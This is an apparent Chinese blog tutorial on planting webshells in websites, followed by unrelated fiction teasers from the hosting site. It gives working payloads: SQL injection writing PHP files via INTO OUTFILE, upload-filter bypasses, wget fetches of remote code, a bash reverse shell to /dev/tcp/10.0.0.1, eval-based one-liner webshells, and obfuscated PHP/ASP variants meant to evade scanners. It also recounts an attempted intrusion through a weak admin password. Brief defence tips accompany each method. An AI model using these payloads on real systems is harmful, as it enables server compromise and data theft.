为什么要入侵一个网站

我们为什么要入侵一个网站

我觉得以我现在的水平无法回答这个问题。

但是我客观的认为,入侵一个网站最根本的原因是想拿到我们想要的数据,
不管我们是站在的立场是什么。

什么是webshell

webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

1.webshell用于网站管理,服务器管理根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令
2.另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。

我们如何成功的上传一个webshell

  • SQL注入(mysql,oracle,mssql,具有file权限)获取webshell
    1.连接当前Mysql数据库的账户,具有File_priv权限
    2.知道网站的绝对路径(通过php报错信息,load_file,google搜索报错信息,phpinfo.php)
    3.mysql有权限到网站的目录下写文件
    4.而且单引号不能被转义
    5.可以通过爆出敏感信息,登录后台(配合网站后台功能实现上传webshell)
利用load_file('/etc/passwd')读取文件
index.php?id=1 union select 1,2,3,'<?php phpinfo(); ?>' into
outfile '/var/www/html/phpinfo.php'
防御:
1.数据库连接账号不使用root权限
2.php报错功能关闭
3.mysql账户没有权限向网站目录下写文件
4.过滤单引号
  • 上传漏洞获取webshell
    1.利用网站编辑器(editor)存在版本漏洞
    2.网站编辑的上传功能
测试上传,
1.本地绕过(文件类型,MIME,文件内容)
2.截断上传,/xx.php%00jsp,实现上传木马
3.上传.htaccess目录,控制解析的脚本。(利用jpg后缀的解析php文件)
4.绕过黑名单。

3.利用解析漏洞(查看web服务器,类型,版本)工具firebug,burp等。

有apache,nginx,IIS,php-cgi
防御:
1.使用服务端验证
2.检测文件类容
3.文件类容加载,和二次渲染。
  • 任意命令执行
    条件:
    知道网站的绝对路径,apache对网站目录有写文件的权限
    其实任意命令执行漏洞,就相当于webshell
    1.直接读写文件(写一句话木马)
index.php?command=echo "<?php phpinfo(); ?>" > /var/www/
html/phpinfo.php
index.php?command=wget -O /var/www/html/phpinfo.php
http://xxxx/phpinfo.txt

2.反弹shell到本地

1.bash -i >& /dev/tcp/10.0.0.1/8080 0>&1(linux环境下)
执行远程Samba里面的二进制文件
2.在windows7环境以下,
\\10.0.0.1\shell.exe   
windows8环境以后powershell
Powershell经常通过注册表,开始菜单,或者计划任务来实现自启动的目的,通常用sysinternals的autorun就能找到了。
另外C:\Users\\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1可以达到和
C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1一样的效果。

防御:
过滤单个特殊符号,使用escapeshellarg和addslashes函数过滤。

  • 任意代码执行
    条件:apache对网站有可写权限,执行代码获取网站目录
1.index.php?code=file_put_contents($_POST[f], $_POST[d]);
f=phpinfo.php&d=<?php phpinfo(); ?>
如果apache没有对网站目录有写权限
index.php?code=eval($_POST[1]);直接写入一句话。
  • 任意文件包含
    1.利用include和require函数包含上传的文件或是图片。
    2.包含日志文件,getshell
1.先读取/etc配置文件获取日志文件的路径
2.然后使用curl请求服务,在请求后面写入一句话木马
3.或是利用burp抓包,改包,将php代码插入到get请求中,或是user-agent中。

3.远程包含一个有木马的txt文件
防御:
过滤.(点)/(斜杠)\(反斜杠)
使用open_basedir配置限制访问限制指定区域。

  • 网站后台自带的功能
    1.数据库备份功能,数据库恢复功能
    2.文件管理
    3.可以控制上传功能

** 如何查杀webshell**

静态查杀特征:
1.特殊敏感字符eval,file_put_contents(),include()。等等函数
2.phpinfo,system,php_uname,chmod,fopen,flclose,readfile,edoced_46esab常见的特征
3.利用编码

<?php
@$_++;
$__=(“#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);?>
<?
@$_POST[0]($_POST[1])
<?
@eval($_POST[1])
来实现免查杀

4.使用调回函数callback

<?php
function funfunc($str){}
echo preg_replace("/<title>(.+?)<\/title>/ies",'funfunc("\1")',
$_POST["cmd"]);
?>
cmd=<title>{${phpinfo()}}</tile>

5.利用include函数在脚本文件中加载一个


    include_path = “E:\PHPnow-1.5.6\htdocs;”

这个配置信息表示加载页眉页脚的文集位置,path规则是”\path1;\path2″,表示将path1路径的
文件夹下的页眉页脚文件添加到path中的文件中去,因为这里是一个‘.’表示根路径,
这里就相当于添加到了主页上面去了,然后hehe.asp文件里面写上一句话,
就可以通过php添加页眉的共能,将一句话写入网站首页。

6.拆分法(asp)
将<%eval request(“x”)%>拆分为<%Y=request(“x”)%><%eval(Y)%>,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。
还有拆分法加强版:

<%IfRequest("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%>

实例

找到网站后台,弱密码登录。
利用网站特有功能,创建文件夹,和文件上传功能。


然后上传一个php文件发现不允许上传。

![]J$8C4.png](http://upload-images.jianshu.io/upload_images/2495234-2a1a151552b6d3fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

通过本地抓包,修改文件后缀。


成功上传php代码。


不幸的是,他有waf,现在的水平只能望而兴叹。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,015评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,262评论 1 292
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,727评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,986评论 0 205
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,363评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,610评论 1 219
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,871评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,582评论 0 198
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,297评论 1 242
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,551评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,053评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,385评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,035评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,079评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,841评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,648评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,550评论 2 270

推荐阅读更多精彩内容